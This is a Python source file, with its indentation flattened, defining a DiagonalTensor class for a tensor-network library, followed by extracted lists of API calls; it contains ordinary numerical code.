----------
shape : None or tuple of int, optional
The expected shape of the tensor.
labels : None or tuple of str, optional
The labels to be put for each dimension, if None then automatically generated from lower case letters.
data : None or ndarray or 1D-array of float, optional
The data in the tensor.
If None and the data is needed(not TensorLike), then generated as xplib.xp.random.random_sample.
If shape is given, data does not need to have the same shape as "shape", but the number of elements should be the same.
If 1D-array, then taken as the diagonal elements, can be used for diagonal tensors of any rank.
degreeOfFreedom : None or int, optional
Local degree of freedom for this tensor.
name : None or str, optional
The name of the tensor to create.
legs : None or list of Leg, optional
The legs of this tensor. If None, then automatically generated.
diagonalFlag : bool, default False
Whether this tensor is diagonal tensor or not. Diagonal tensors can behave better in efficiency for tensor contractions, so we deal with them with child class DiagonalTensor, check the details in CTL.tensor.diagonalTensor.
tensorLikeFlag : bool, default False
If True, then the tensor is a "TensorLike": will not contain any data, but behave just like a tensor.
xp : object, default numpy
The numpy-like library for numeric functions.
Attributes
----------
tensorLikeFlag : bool
Whether the tensor is a "TensorLike".
xp : object
The numpy-like library for numeric functions.
diagonalFlag : bool
Whether the tensor is a "DiagonalTensor"
totalSize : int
Total number of components in this tensor.
degreeOfFreedom : int
Number of local degree of freedom. E.g. for Ising Tensor around one spin, it can be 1.
name : None or str
The name of the tensor.
legs : list of Leg
The legs from this tensor, can be "attracted" to another leg to form a bond. If not so, then it is a free leg.
a : ndarray of float
The data of the tensor.
Notes
-----
    Please note shape, labels, data and legs: although they are all optional, they need to contain enough (and not contradictory) information to deduce the shape, labels, data and legs of the tensor; the deduction strategy is described below:
For labels: priority is legs = labels, default: auto-generated in order from lowercase letters.
For shape: priority is legs = shape > data.
For legs: priority is legs, default: auto-generated with labels and shape.
For data: priority is data.reshape(shape), default: xplib.xp.random.random_sample(shape).
("For property A, priority is B > C = D > E, default: F" means, A can be deduced from B, C, D, E, so we consider from high priority to low priority. If B exist, then we take the deduced value from B, and change C, D, E if they in some sense compatible with B. Otherwise consider C & D. For values of the same priority, if both of them are provided, then they should be the same. If none of B, C, D, E can deduce A, then generate A with F.)
"checkXXXYYYCompatible" functions will do the above checkings to make the information in the same priority compatible with each other.
"""
def deduceDimension(self, data, labels):
"""
Deduce the dimension of current diagonal tensor from data and labels.
Parameters
----------
data : None or 1D array or ndarray
The data to be put in the diagonal tensor.
labels : None or list of Leg
The labels to be added to the legs of this tensor.
Returns
-------
int
The dimension of the current tensor.
"""
# if the labels is given: then use labels
# otherwise, if data is given(as an ndarray), then we return then len(data.shape)
# otherwise, error
if (data is not None) and (len(data.shape) != 1) and (labels is not None) and ((len(labels) != len(data.shape)) or (len(labels) == 0 and len(data.shape) == 1)):
raise ValueError(funcs.errorMessage(location = "DiagonalTensor.deduceDimension", err = "data {} and labels {} are not compatible.".format(data, labels)))
# what if len(labels) == 0, len(data.shape) == 1?
if (labels is not None):
return len(labels)
elif (data is not None):
# then data must be an numpy array
return len(data.shape)
else:
raise ValueError(funcs.errorMessage(location = "DiagonalTensor.deduceDimension", err = "both data and labels are None."))
# TODO: add the affect of "legs" to the deduction
# the strategy is almost the same as Tensor
# the only difference is that, when we have one integer as shape, and we have dimension: we can give the real shape by repeat for dim times
# deduce strategy:
# we want length and dim
# priority for length: shape > data
# priority for dim: shape > labels > data
# 0. leg exist: the shape is already done
# check if shape of leg is ok for diagonal tensor
# if shape exist: check if shape is ok with shape of leg(integer / tuple)
# if label exist: check if dimension of labels ok with legs
# if data exist: ...
# 1. shape exist: shape can be either an integer, or a n-element tuple
# for int case: deduce dim from labels, then data
# for tuple case: (length, data) is ready
# then check labels: should be either None or len(labels) == dim
# then check data: either None, length-element array, dim-dimensional tensor
# 2. shape not exist: check labels for dim
# then check data for dim(1d array, dim-d array with all equal shapes)
# and generate l from shape of data
# 3. labels not exist: check data for (dim, length)
def checkLegsDiagonalCompatible(self, legs):
"""
        Check whether the shape from legs can form a diagonal tensor, with all the indices having the same dimension.
Parameters
----------
legs : list of Leg
Legs of the tensor that already existed before creating the tensor.
Returns
-------
bool
Whether the legs can form a diagonal tensor.
"""
if (len(legs) == 0):
return True
l = legs[0].dim
for leg in legs:
if (leg.dim != l):
return False
return True
def checkShapeDiagonalCompatible(self, shape):
"""
        Check whether the shape can form a diagonal tensor, with all the indices having the same dimension.
Parameters
----------
shape : tuple of int
Shape of the tensor that already existed before creating the tensor.
Returns
-------
bool
Whether the legs can form a diagonal tensor.
"""
if (len(shape) == 0):
return True
l = shape[0]
for dim in shape:
if (dim != l):
return False
return True
def checkLegsShapeCompatible(self, legs, shape):
"""
For information, check Tensor.checkLegsShapeCompatible.
"""
if (shape is None):
return True
if (isinstance(shape, int)):
shape = tuple([shape] * len(legs))
if (isinstance(shape, list) or isinstance(shape, tuple)):
shapeList = list(shape)
if (len(shapeList) != len(legs)):
return False
for dim, leg in zip(shapeList, legs):
if (dim != leg.dim):
return False
return True
else:
return False
def checkShapeDataCompatible(self, shape, data):
"""
For information, check Tensor.checkShapeDataCompatible.
"""
# we know shape, and want to see if data is ok
if (data is None):
return True
if (isinstance(shape, int)):
shape = tuple([shape] * len(data.shape))
return ((len(data.shape) == 1) and (len(shape) > 0) and (len(data) == shape[0])) or (funcs.tupleProduct(data.shape) == funcs.tupleProduct(shape))
def generateData(self, shape, data, isTensorLike):
"""
For information, check Tensor.generateData.
Returns
-------
1D-array of float
The data to be saved in this diagonal tensor.
"""
if (isTensorLike):
return None
# print('generating data for data = {}'.format(data))
if (data is None):
data = xplib.xp.ones(shape[0])
# otherwise, data can be 1D-array, or ndarray
elif (len(data.shape) == 1):
data = xplib.xp.copy(data)
else:
l, dim = len(shape), shape[0]
# print('dim = {}, l = {}'.format(dim, l))
# print(xplib.xp.diag_indices(dim, l))
data = xplib.xp.copy(data[xplib.xp.diag_indices(dim, l)])
return data
def deduction(self, legs, data, labels, shape, isTensorLike = False):
"""
For more information, check Tensor.deduction
"""
# in Tensor: the "shape" has the highest priority
# so if the shape is given here, it should be taken
# however, if the shape is given as an integer: then we need to deduce the dimension
# if shape exist: then according to shape(but dim may be deduced)
# otherwise, if labels exist, then dim from labels, and l from data
# otherwise, both dim and l from data
funcName = "DiagonalTensor.deduction"
# first, consider scalar case
if (legs is None) and (labels is None) and (shape == () or ((data is not None) and (data.shape == ()))):
if (data is None) and (not isTensorLike):
data = xplib.xp.array(1.0)
return [], data, [], () # scalar
if (legs is not None):
if (not self.checkLegsDiagonalCompatible(legs = legs)):
raise ValueError(funcs.errorMessage('legs {} cannot be considered as legs for diagonal tensor.'.format(legs), location = funcName))
if (not self.checkLegsLabelsCompatible(legs = legs, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with legs {}'.format(labels, legs), location = funcName))
if (labels is None):
labels = [leg.name for leg in legs]
if (not self.checkLegsShapeCompatible(legs = legs, shape = shape)):
raise ValueError(funcs.errorMessage('shape {} is not compatible with legs {}'.format(shape, legs), location = funcName))
if (shape is None) or (isinstance(shape, int)):
shape = tuple([leg.dim for leg in legs])
if (not self.checkShapeDataCompatible(shape = shape, data = data)):
raise ValueError(funcs.errorMessage('data shape {} is not compatible with required shape {}'.format(data.shape, shape), location = funcName))
elif (shape is not None):
if (isinstance(shape, int)):
dim = self.deduceDimension(data = data, labels = labels)
shape = tuple([shape] * dim)
if (not self.checkShapeDiagonalCompatible(shape = shape)):
raise ValueError(funcs.errorMessage('shape {} cannot be considered as shape for diagonal tensor.'.format(shape), location = funcName))
if (not self.checkShapeLabelsCompatible(shape = shape, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with required shape {}'.format(labels, shape), location = funcName))
if (labels is None):
labels = self.generateLabels(len(shape))
if (not self.checkShapeDataCompatible(shape = shape, data = data)):
raise ValueError(funcs.errorMessage('data shape {} is not compatible with required shape {}'.format(data.shape, shape), location = funcName))
elif (data is not None):
# legs, shape are both None
shape = data.shape
if (not self.checkShapeDiagonalCompatible(shape = shape)):
raise ValueError(funcs.errorMessage('data shape {} cannot be considered as shape for diagonal tensor.'.format(shape), location = funcName))
dim = self.deduceDimension(data = data, labels = labels)
if (len(shape) == 1) and (dim > 1):
shape = tuple([shape[0]] * dim)
if (not self.checkShapeLabelsCompatible(shape = shape, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with required shape {}'.format(labels, shape), location = funcName))
if (labels is None):
labels = self.generateLabels(len(shape))
else:
raise ValueError(funcs.errorMessage("Tensor() cannot accept parameters where legs, shape and data being None simultaneously.", location = funcName))
# elif (shape is not None):
# if (isinstance(shape, int)):
# dim = self.deduceDimension(data, labels)
# l = shape
# else:
# dim = len(shape)
# if (dim == 0) or (not funcs.checkAllEqual(shape)):
# raise ValueError(funcs.errorMessage(location = funcName, err = "shape {} is not valid.".format(shape)))
# l = shape[0]
# # then we need to deduce dimension
# if (labels is not None) and (len(labels) != dim):
# raise ValueError(funcs.errorMessage(location = funcName, err = "number of labels is not the same as dim: {} expected but {} obtained.".format(dim, len(labels))))
# elif (data is not None):
# # data can be either shape, or an array of l
# if (len(data.shape) == 1):
# if (data.shape[0] != l):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data length is not the same as length deduced from shape: {} expected but {} obtained.".format(l, data.shape[0])))
# elif (len(data.shape) != dim) or (data.shape != tuple([l] * dim)):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data shape is not correct: {} expected but {} obtained.".format(tuple([l] * dim), data.shape)))
# # shape is None, how to deduce shape?
# elif (labels is not None):
# dim = len(labels)
# if (data is None):
# raise ValueError(funcs.errorMessage(location = funcName, err = "cannot deduce data shape since data and shape are both None."))
# elif (len(data.shape) == 1):
# l = len(data)
# elif not funcs.checkAllEqual(data.shape):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data.shape {} is not valid.".format(data.shape)))
# else:
# if (len(data.shape) != dim):
# raise ValueError(funcs.errorMessage(location = funcName, err = "dimension of data is not compatible with dimension deduced from labels: expect {} but {} is given.".format(dim, len(data.shape))))
# l = data.shape[0]
# else:
# # deduce from data.shape
# if (data is None):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data, labes and shape are all None."))
# elif not funcs.checkAllEqual(data.shape):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data.shape {} is not valid.".format(data.shape)))
# else:
# dim = len(data.shape)
# l = data.shape[0]
# print('l = {}, dim = {}'.format(l, dim))
# shape = tuple([l] * dim)
data = self.generateData(shape = shape, data = data, isTensorLike = isTensorLike)
# if (tensorLikeFlag):
# data = None
# elif (data is None):
# # default is identity
# data = xplib.xp.ones(l)
# elif (len(data.shape) == 1):
# data = xplib.xp.copy(data)
# else:
# data = xplib.xp.array([data[tuple([x] * dim)] for x in range(l)])
# must be a copy of original "data" if exist
# if (labels is None):
# labels = self.generateLabels(dim)
if (legs is None):
legs = []
for label, dim in zip(labels, list(shape)):
legs.append(Leg(self, dim, label))
else:
for leg in legs:
leg.tensor = self
return legs, data, labels, shape
def __init__(self, shape = None, labels = None, data = None, degreeOfFreedom = None, name = None, legs = None, tensorLikeFlag = False, dtype = xplib.xp.float64):
super().__init__(diagonalFlag = True, tensorLikeFlag = tensorLikeFlag, dtype = dtype)
legs, data, labels, shape = self.deduction(legs = legs, data = data, labels = labels, shape = shape, isTensorLike = tensorLikeFlag)
self.a = data
self.legs = legs
# self.totalSize = funcs.tupleProduct(shape)
# functions of Tensor from here
self.degreeOfFreedom = degreeOfFreedom
self.name = name
# self._dim = len(shape)
if shape == ():
self._length = 1
else:
self._length = shape[0]
@property
def dim(self):
return len(self.legs)
@property
def shape(self):
return tuple([self._length] * self.dim)
@property
def labels(self):
return [leg.name for leg in self.legs]
@property
def chi(self):
return self._length
def __str__(self):
if (self.tensorLikeFlag):
objectStr = 'DiagonalTensorLike'
else:
objectStr = 'DiagonalTensor'
if not (self.degreeOfFreedom is None):
dofStr = ', degree of freedom = {}'.format(self.degreeOfFreedom)
else:
dofStr = ''
if (self.name is not None):
nameStr = self.name + ', '
else:
nameStr = ''
return '{}({}shape = {}, labels = {}{})'.format(objectStr, nameStr, self.shape, self.labels, dofStr)
def __repr__(self):
if (self.tensorLikeFlag):
objectStr = 'DiagonalTensorLike'
else:
objectStr = 'DiagonalTensor'
if not (self.degreeOfFreedom is None):
dofStr = ', degree of freedom = {}'.format(self.degreeOfFreedom)
else:
dofStr = ''
if (self.name is not None):
nameStr = self.name + ', '
else:
nameStr = ''
return '{}({}shape = {}, labels = {}{})'.format(objectStr, nameStr, self.shape, self.labels, dofStr)
def __matmul__(self, b):
return contractTwoTensors(ta = self, tb = b)
def bondDimension(self):
"""
The bond dimension of the current diagonal tensor: it is the same over all dimensions.
Returns
-------
int
The dimension for each index.
"""
return self._length
def moveLegsToFront(self, legs):
"""
Change the orders of legs: move a given set of legs to the front while not modifying the relative order of other legs. Use xplib.xp.moveaxis to modify the data if this is not a TensorLike object.
        For a diagonal tensor this actually changes nothing in the data: for Tensor this function changes the order of the data indices, but for a diagonal tensor it is only a virtual reordering of the legs.
Parameters
----------
legs : list of Leg
The set of legs to be put at front.
"""
moveFrom = []
moveTo = []
currIdx = 0
movedLegs = legs
for currLeg in legs:
for i, leg in enumerate(self.legs):
if (leg == currLeg):
moveFrom.append(i)
moveTo.append(currIdx)
currIdx += 1
break
for leg in movedLegs:
self.legs.remove(leg)
# print(moveFrom, moveTo)
# print(labelList)
# print(self.labels)
self.legs = movedLegs + self.legs
# self.a = xplib.xp.moveaxis(self.a, moveFrom, moveTo)
def toVector(self):
"""
Deprecated
Make a vector according to the diagonal elements.
        Deprecated since this behavior differs from Tensor, which returns the flattened ndarray data. However, returning the full ndarray here is usually useless for a diagonal tensor and may create a CPU-time issue.
To obtain the data, DiagonalTensor.a is enough.
Returns
-------
1D ndarray of float
A vector contains diagonal elements of the diagonal tensor.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to vector since no data contained.', 'DiagonalTensor.toVector')
funcs.deprecatedFuncWarning(funcName = "DiagonalTensor.toVector", deprecateMessage = "This will return a vector corresponding to the diagonal of tensor instead of the complete tensor.")
return xplib.xp.copy(xplib.xp.ravel(self.a))
def toMatrix(self, rows, cols):
"""
Deprecated
Make a matrix of the data of this diagonal tensor, given the labels or legs of rows and cols.
        Deprecated since this function is time-consuming (O(n^d)), and for most cases there are much better ways to use the data than building a full matrix. For details, see CTL.tensor.contract for more information.
Parameters
----------
rows : None or list of str or list of Leg
The legs for the rows of the matrix. If None, deducted from cols.
cols : None or list of str or list of Leg
The legs for the cols of the matrix. If None, deducted from rows.
Returns
-------
2D ndarray of float
The data of this tensor, in the form of (rows, cols).
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to matrix since no data contained.', 'DiagonalTensor.toMatrix')
# print(rows, cols)
# print(self.labels)
# input two set of legs
funcs.deprecatedFuncWarning(funcName = "DiagonalTensor.toMatrix", deprecateMessage = "Diagonal tensors should be used in a better way for linear algebra calculation rather than be made into a matrix.")
assert not ((rows is None) and (cols is None)), "Error in Tensor.toMatrix: toMatrix must have at least row or col exist."
if (rows is not None) and (isinstance(rows[0], str)):
rows = [self.getLeg(label) for label in rows]
if (cols is not None) and (isinstance(cols[0], str)):
cols = [self.getLeg(label) for label in cols]
if (cols is None):
cols = funcs.listDifference(self.legs, rows)
if (rows is None):
rows = funcs.listDifference(self.legs, cols)
assert (funcs.compareLists(rows + cols, self.legs)), "Error Tensor.toMatrix: rows + cols must contain(and only contain) all legs of tensor."
colIndices = self.getLegIndices(cols)
rowIndices = self.getLegIndices(rows)
colShape = tuple([self.shape[x] for x in colIndices])
rowShape = tuple([self.shape[x] for x in rowIndices])
colTotalSize = funcs.tupleProduct(colShape)
rowTotalSize = funcs.tupleProduct(rowShape)
data = funcs.diagonalNDTensor(self.a, self.dim)
data = xplib.xp.reshape(data, (rowTotalSize, colTotalSize))
return data
def copy(self):
"""
        Make a copy of the current diagonal tensor, without copying the legs. For more information, refer to Tensor.copy.
Returns
-------
DiagonalTensor
A copy of the current diagonal tensor, all the information can be copied is contained.
"""
return DiagonalTensor(data = self.a, shape = self.shape, degreeOfFreedom = self.degreeOfFreedom, name = self.name, labels = self.labels, tensorLikeFlag = self.tensorLikeFlag)
# no copy of tensor legs, which may contain connection information
def toTensorLike(self):
"""
Make a copy of current tensor, without copying the legs. This function works almost like self.copy(), but without copying the data.
Returns
-------
DiagonalTensor
A DiagonalTensorLike of the current tensor, all the information can be copied is contained except legs and data.
"""
if (self.tensorLikeFlag):
return self.copy()
else:
return DiagonalTensor(data = None, degreeOfFreedom = self.degreeOfFreedom, name = self.name, labels = self.labels, shape = self.shape, tensorLikeFlag = True)
def moveLabelsToFront(self, labelList):
"""
Change the orders of legs: move a given set of labels to the front. For details, check "self.moveLegsToFront".
Parameters
----------
labelList : list of str
The set of labels to be put at front.
"""
legs = self.getLegsByLabel(labelList)
self.moveLegsToFront(legs)
# legs = [self.getLeg(label) for label in labelList]
# self.moveLegsToFront(legs)
# moveFrom = []
# moveTo = []
# currIdx = 0
# movedLegs = []
# for label in labelList:
# for i, leg in enumerate(self.legs):
# if (leg.name == label):
# moveFrom.append(i)
# moveTo.append(currIdx)
# currIdx += 1
# movedLegs.append(leg)
# break
# for leg in movedLegs:
# self.legs.remove(leg)
# self.legs = movedLegs + self.legs
# self.a = xplib.xp.moveaxis(self.a, moveFrom, moveTo)
def outProduct(self, labelList, newLabel):
"""
Deprecated
Comment
-------
The outer product will destroy the shape of diagonal tensor: we cannot easily combine several legs if it is a full diagonal tensor, so a TypeError will be raised.
"""
raise TypeError(funcs.errorMessage(location = "DiagonalTensor.outProduct", err = "DiagonalTensor cannot perform outProduct, since the diagonal nature will be destroyed."))
def norm(self):
"""
Norm of the current tensor. O(n).
Returns
-------
float
The norm of data.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike do not have norm since no data contained.', 'DiagonalTensor.norm')
return xplib.xp.linalg.norm(self.a)
def trace(self, rows = None, cols = None):
"""
Trace of the current diagonal tensor. To not destroy the property for the diagonal tensors, this function can only be used to calculate the global trace on the main diagonal.
Parameters
----------
rows, cols: None
Only set to be compatible with the usage for Tensor
Returns
-------
float
The trace of the matrix generated by given cols and rows.
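        Examples
        --------
        An indicative sketch (an editorial assumption, not taken from the original docs):
        DiagonalTensor(shape=(2, 2), data=xplib.xp.array([1.0, 2.0])).trace() evaluates to 3.0.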
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike do not have trace since no data contained.', 'DiagonalTensor.trace')
return xplib.xp.sum(self.a)
def single(self):
"""
Generate a single value from a tensor.
Note the difference between this and Tensor.single(): in Tensor object, the data are saved as ndarray, so for single value it must be a 0-d array, in other words, a single number.
However, for DiagonalTensor: in all cases the data are saved as 1D-array, so we need to first decide whether it can be transferred to a single number, and then return the lowest index.
Returns
-------
float
A single value of this tensor.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to single value since no data contained.', 'DiagonalTensor.single')
assert self._length == 1, "Error: cannot get single value from diagTensor whose length is not (1,)."
assert self.shape == (), "Error: cannot get single value from tensor whose shape is not ()."
return self.a[()]
def toTensor(self, labels = None):
"""
Return a ndarray of this tensor. Since the current tensor object only saves the main diagonal, the tensor itself may be much larger, so this is not recommended and not used in any of the internal functions.
Parameters
----------
labels : None or list of str
The order of labels for the output tensor. Note that if labels is None, the order of legs is not fixed, may differ from time to time.
Returns
-------
ndarray of float
The data of the tensor, order of legs are given by the labels.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to tensor since no data contained.', 'DiagonalTensor.toTensor')
if (labels is not None):
self.reArrange(labels)
return funcs.diagonalNDTensor(self.a, self.dim)
def sumOutLeg(self, leg, weights = None):
"""
        Sum out one leg to make a (D - 1)-dimensional tensor. Gives a warning (and does nothing) if the leg does not belong to the current tensor, and gives a warning if the leg is connected to some bond (i.e. not free).
Parameters
----------
leg : Leg
The leg to be summed out.
weights : 1-d array, optional
If not None, then each index on given dimension will be weighted by weights[i].
"""
if not (leg in self.legs):
warnings.warn(funcs.warningMessage("leg {} is not in tensor {}, do nothing.".format(leg, self), location = 'Tensor.sumOutLeg'), RuntimeWarning)
return
if leg.bond is not None:
warnings.warn(funcs.warningMessage("leg {} to be summed out is connected to bond {}.".format(leg, leg.bond), location = 'Tensor.sumOutLeg'), RuntimeWarning)
idx = self.legs.index(leg)
# self.a = xplib.xp.sum(self.a, axis = idx)
self.legs = self.legs[:idx] + self.legs[(idx + 1):]
# if weights is None:
if (len(self.legs) == 0):
# not a diagonal tensor, since the last sum will give a single value
if weights is None:
self.a = xplib.xp.array(xplib.xp.sum(self.a))
else:
self.a = xplib.xp.array(xplib.xp.sum(self.a * weights))
self._length = 1
else:
if (weights is not None):
self.a = self.a * weights
def typeName(self):
"""
The type of the current class.
Returns
-------
{"DiagonalTensor", "DiagonalTensorLike"}
"""
if (self.tensorLikeFlag):
return "DiagonalTensorLike"
else:
return "DiagonalTensor"
from CTL.tensor.contract.contract import contractTwoTensors
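# --- Hedged usage sketch (editorial addition, not part of the original module) ---
# A minimal demonstration of constructing a diagonal tensor and taking its trace;
# the shape and data values below are illustrative assumptions only.
if __name__ == "__main__":
    demo = DiagonalTensor(shape=(2, 2), data=xplib.xp.array([1.0, 2.0]))
    print(demo)          # DiagonalTensor(shape = (2, 2), labels = [...])
    print(demo.trace())  # sum of the diagonal elements, i.e. 3.0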
|
[
"CTL.funcs.xplib.xp.ravel",
"CTL.funcs.xplib.xp.ones",
"CTL.funcs.funcs.listDifference",
"CTL.funcs.funcs.diagonalNDTensor",
"CTL.funcs.funcs.compareLists",
"CTL.funcs.xplib.xp.linalg.norm",
"CTL.funcs.xplib.xp.copy",
"CTL.funcs.funcs.deprecatedFuncWarning",
"CTL.funcs.funcs.errorMessage",
"CTL.tensor.contract.contract.contractTwoTensors",
"CTL.funcs.funcs.tupleProduct",
"CTL.funcs.xplib.xp.sum",
"CTL.funcs.xplib.xp.diag_indices",
"CTL.tensor.leg.Leg",
"CTL.funcs.xplib.xp.array",
"CTL.funcs.xplib.xp.reshape"
] |
[((20375, 20408), 'CTL.tensor.contract.contract.contractTwoTensors', 'contractTwoTensors', ([], {'ta': 'self', 'tb': 'b'}), '(ta=self, tb=b)\n', (20393, 20408), False, 'from CTL.tensor.contract.contract import contractTwoTensors\n'), ((22452, 22586), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike cannot be transferred to vector since no data contained."""', '"""DiagonalTensor.toVector"""'], {}), "(\n 'DiagonalTensorLike cannot be transferred to vector since no data contained.'\n , 'DiagonalTensor.toVector')\n", (22470, 22586), True, 'import CTL.funcs.funcs as funcs\n'), ((22585, 22780), 'CTL.funcs.funcs.deprecatedFuncWarning', 'funcs.deprecatedFuncWarning', ([], {'funcName': '"""DiagonalTensor.toVector"""', 'deprecateMessage': '"""This will return a vector corresponding to the diagonal of tensor instead of the complete tensor."""'}), "(funcName='DiagonalTensor.toVector',\n deprecateMessage=\n 'This will return a vector corresponding to the diagonal of tensor instead of the complete tensor.'\n )\n", (22612, 22780), True, 'import CTL.funcs.funcs as funcs\n'), ((23700, 23834), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike cannot be transferred to matrix since no data contained."""', '"""DiagonalTensor.toMatrix"""'], {}), "(\n 'DiagonalTensorLike cannot be transferred to matrix since no data contained.'\n , 'DiagonalTensor.toMatrix')\n", (23718, 23834), True, 'import CTL.funcs.funcs as funcs\n'), ((23922, 24133), 'CTL.funcs.funcs.deprecatedFuncWarning', 'funcs.deprecatedFuncWarning', ([], {'funcName': '"""DiagonalTensor.toMatrix"""', 'deprecateMessage': '"""Diagonal tensors should be used in a better way for linear algebra calculation rather than be made into a matrix."""'}), "(funcName='DiagonalTensor.toMatrix',\n deprecateMessage=\n 'Diagonal tensors should be used in a better way for linear algebra calculation rather than be made into a matrix.'\n )\n", (23949, 24133), True, 'import CTL.funcs.funcs as funcs\n'), ((24678, 24720), 'CTL.funcs.funcs.compareLists', 'funcs.compareLists', (['(rows + cols)', 'self.legs'], {}), '(rows + cols, self.legs)\n', (24696, 24720), True, 'import CTL.funcs.funcs as funcs\n'), ((25052, 25080), 'CTL.funcs.funcs.tupleProduct', 'funcs.tupleProduct', (['colShape'], {}), '(colShape)\n', (25070, 25080), True, 'import CTL.funcs.funcs as funcs\n'), ((25104, 25132), 'CTL.funcs.funcs.tupleProduct', 'funcs.tupleProduct', (['rowShape'], {}), '(rowShape)\n', (25122, 25132), True, 'import CTL.funcs.funcs as funcs\n'), ((25149, 25189), 'CTL.funcs.funcs.diagonalNDTensor', 'funcs.diagonalNDTensor', (['self.a', 'self.dim'], {}), '(self.a, self.dim)\n', (25171, 25189), True, 'import CTL.funcs.funcs as funcs\n'), ((25205, 25257), 'CTL.funcs.xplib.xp.reshape', 'xplib.xp.reshape', (['data', '(rowTotalSize, colTotalSize)'], {}), '(data, (rowTotalSize, colTotalSize))\n', (25221, 25257), True, 'import CTL.funcs.xplib as xplib\n'), ((28234, 28348), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike do not have norm since no data contained."""', '"""DiagonalTensor.norm"""'], {}), "(\n 'DiagonalTensorLike do not have norm since no data contained.',\n 'DiagonalTensor.norm')\n", (28252, 28348), True, 'import CTL.funcs.funcs as funcs\n'), ((28355, 28383), 'CTL.funcs.xplib.xp.linalg.norm', 'xplib.xp.linalg.norm', (['self.a'], {}), '(self.a)\n', (28375, 28383), True, 'import CTL.funcs.xplib as xplib\n'), ((28934, 29050), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike do 
not have trace since no data contained."""', '"""DiagonalTensor.trace"""'], {}), "(\n 'DiagonalTensorLike do not have trace since no data contained.',\n 'DiagonalTensor.trace')\n", (28952, 29050), True, 'import CTL.funcs.funcs as funcs\n'), ((29057, 29077), 'CTL.funcs.xplib.xp.sum', 'xplib.xp.sum', (['self.a'], {}), '(self.a)\n', (29069, 29077), True, 'import CTL.funcs.xplib as xplib\n'), ((29690, 29828), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike cannot be transferred to single value since no data contained."""', '"""DiagonalTensor.single"""'], {}), "(\n 'DiagonalTensorLike cannot be transferred to single value since no data contained.'\n , 'DiagonalTensor.single')\n", (29708, 29828), True, 'import CTL.funcs.funcs as funcs\n'), ((30739, 30873), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike cannot be transferred to tensor since no data contained."""', '"""DiagonalTensor.toTensor"""'], {}), "(\n 'DiagonalTensorLike cannot be transferred to tensor since no data contained.'\n , 'DiagonalTensor.toTensor')\n", (30757, 30873), True, 'import CTL.funcs.funcs as funcs\n'), ((30947, 30987), 'CTL.funcs.funcs.diagonalNDTensor', 'funcs.diagonalNDTensor', (['self.a', 'self.dim'], {}), '(self.a, self.dim)\n', (30969, 30987), True, 'import CTL.funcs.funcs as funcs\n'), ((9880, 9903), 'CTL.funcs.xplib.xp.ones', 'xplib.xp.ones', (['shape[0]'], {}), '(shape[0])\n', (9893, 9903), True, 'import CTL.funcs.xplib as xplib\n'), ((22800, 22822), 'CTL.funcs.xplib.xp.ravel', 'xplib.xp.ravel', (['self.a'], {}), '(self.a)\n', (22814, 22822), True, 'import CTL.funcs.xplib as xplib\n'), ((24540, 24577), 'CTL.funcs.funcs.listDifference', 'funcs.listDifference', (['self.legs', 'rows'], {}), '(self.legs, rows)\n', (24560, 24577), True, 'import CTL.funcs.funcs as funcs\n'), ((24624, 24661), 'CTL.funcs.funcs.listDifference', 'funcs.listDifference', (['self.legs', 'cols'], {}), '(self.legs, cols)\n', (24644, 24661), True, 'import CTL.funcs.funcs as funcs\n'), ((27872, 28032), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', ([], {'location': '"""DiagonalTensor.outProduct"""', 'err': '"""DiagonalTensor cannot perform outProduct, since the diagonal nature will be destroyed."""'}), "(location='DiagonalTensor.outProduct', err=\n 'DiagonalTensor cannot perform outProduct, since the diagonal nature will be destroyed.'\n )\n", (27890, 28032), True, 'import CTL.funcs.funcs as funcs\n'), ((9411, 9441), 'CTL.funcs.funcs.tupleProduct', 'funcs.tupleProduct', (['data.shape'], {}), '(data.shape)\n', (9429, 9441), True, 'import CTL.funcs.funcs as funcs\n'), ((9445, 9470), 'CTL.funcs.funcs.tupleProduct', 'funcs.tupleProduct', (['shape'], {}), '(shape)\n', (9463, 9470), True, 'import CTL.funcs.funcs as funcs\n'), ((10014, 10033), 'CTL.funcs.xplib.xp.copy', 'xplib.xp.copy', (['data'], {}), '(data)\n', (10027, 10033), True, 'import CTL.funcs.xplib as xplib\n'), ((11121, 11140), 'CTL.funcs.xplib.xp.array', 'xplib.xp.array', (['(1.0)'], {}), '(1.0)\n', (11135, 11140), True, 'import CTL.funcs.xplib as xplib\n'), ((5784, 5888), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', ([], {'location': '"""DiagonalTensor.deduceDimension"""', 'err': '"""both data and labels are None."""'}), "(location='DiagonalTensor.deduceDimension', err=\n 'both data and labels are None.')\n", (5802, 5888), True, 'import CTL.funcs.funcs as funcs\n'), ((18001, 18022), 'CTL.tensor.leg.Leg', 'Leg', (['self', 'dim', 'label'], {}), '(self, dim, label)\n', (18004, 18022), False, 'from CTL.tensor.leg 
